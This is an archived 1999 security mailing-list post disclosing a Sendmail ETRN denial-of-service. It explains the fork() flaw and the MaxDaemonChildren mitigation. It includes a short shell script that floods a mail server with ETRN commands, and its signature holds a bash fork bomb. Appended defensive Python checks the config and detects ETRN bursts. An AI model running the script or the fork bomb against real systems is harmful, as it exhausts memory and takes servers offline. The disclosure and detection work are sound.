On Tue, 21 Dec 1999, Rob Jones wrote:

> with or without these double-quotes the message is immediately dropped
> on redhat linux with the message Oops!

Yes, apparently this problem affects all versions of Sendmail, but only with a .cf file left from 8.8.x or previous releases. In fact, obsolete .cf files are quite common if Sendmail has been updated by the administrator - 'by hand' or from binary packages like .rpm - as people have not enough time and good will to rebuild config files when replacing the binary (especially if there are some extensions/custom .cf settings).

So, another thing. There's a nice remote Sendmail ETRN DoS. When the ETRN command is read by Sendmail (it shouldn't be allowed at all, IMHO), it calls fork(). The parent process generates no output - only child-generated output is sent, so the parent won't be notified on send()/write() failure. If we drop the connection (after sending a lot of ETRNs), the parent process will get stuck, repeatedly doing fork() ... sleep(5), till the end of the ETRNs read into the input buffer is reached. This allows us to spawn any amount of 'unusable' sendmail children, hanging for a long period of time - and it can be done using low network bandwidth and resources. Direct result - all server memory consumed (causing Linux 2.0 kernels to crash with messages like 'no memory for sendmail', 'no memory for klogd' etc).

Unlike connect() flooding, this attack generates low traffic, only one connection at a time, and seems to be deadly harmful, unless something like:

# maximum number of children we allow at one time
O MaxDaemonChildren=15

is defined in sendmail.cf (as far as I recall, this option is disabled by default).

The exploit follows (written for its beautiful name):

-- gurghfrbl.sh --
#!/bin/sh
TARGET=localhost
COUNT=150
SLEEP=1
echo "gurghfrbl.sh - (c) lcamtuf '99"
echo -n "Tickle"
while :; do
  echo -n "."
  (
    NIC=0
    while [ "$NIC" -lt "$COUNT" ]; do
      echo "ETRN x"
    done
  ) | telnet $TARGET 25 &>/dev/null &
  sleep $SLEEP
  killall -9 telnet &>/dev/null
done
-- EOF --

_______________________________________________________________________
Michal Zalewski [lcamtufat_private] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 501 4000 69]
To iterate is human, to recurse divine [P. Deutsch]
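A defender-side check for the two points the post turns on, added here as example code that is not part of the original message: it reads a sendmail.cf fragment and reports whether MaxDaemonChildren is actually set (not commented out), and it inspects a captured SMTP command sequence for the many-ETRNs-then-disconnect pattern. The .cf fragments and the session are constructed samples, and the flagging threshold is an assumption.

```python
import re

# Constructed sendmail.cf fragments (not taken from any real install).
CF_UNPROTECTED = """\
# leftover 8.8.x-style sendmail.cf with the limit commented out
O QueueDirectory=/var/spool/mqueue
#O MaxDaemonChildren=15
O RefuseLA=12
"""

CF_PROTECTED = """\
O QueueDirectory=/var/spool/mqueue
# maximum number of children we allow at one time
O MaxDaemonChildren=15
"""

# Matches only an active option line; a leading '#' makes the line a comment.
_MAXCHILD = re.compile(r"^O\s*MaxDaemonChildren\s*=\s*(\d+)\s*$")


def max_daemon_children(cf_text):
    """Return the configured MaxDaemonChildren value, or None when the option
    is absent or commented out (the post says it is disabled by default)."""
    for line in cf_text.splitlines():
        m = _MAXCHILD.match(line.strip())
        if m:
            return int(m.group(1))
    return None


def etrn_burst(session_lines, threshold=10):
    """Inspect the client side of one SMTP session (one command per line).

    Returns (etrn_count, suspicious).  'suspicious' is True when the session
    queues at least `threshold` ETRN commands and then ends without QUIT,
    i.e. the connection was dropped with ETRNs still buffered, which is the
    condition that leaves the parent in its fork()/sleep(5) loop.
    """
    cmds = [l.split()[0].upper() for l in session_lines if l.strip()]
    count = cmds.count("ETRN")
    dropped_without_quit = not cmds or cmds[-1] != "QUIT"
    return count, count >= threshold and dropped_without_quit


# Constructed session mirroring the script's output: 150 ETRNs, then the
# connection is torn down without a QUIT.
SESSION_FLOOD = ["HELO x"] + ["ETRN x"] * 150
SESSION_NORMAL = ["HELO x", "ETRN example.invalid", "QUIT"]
```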
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:23:29 PDT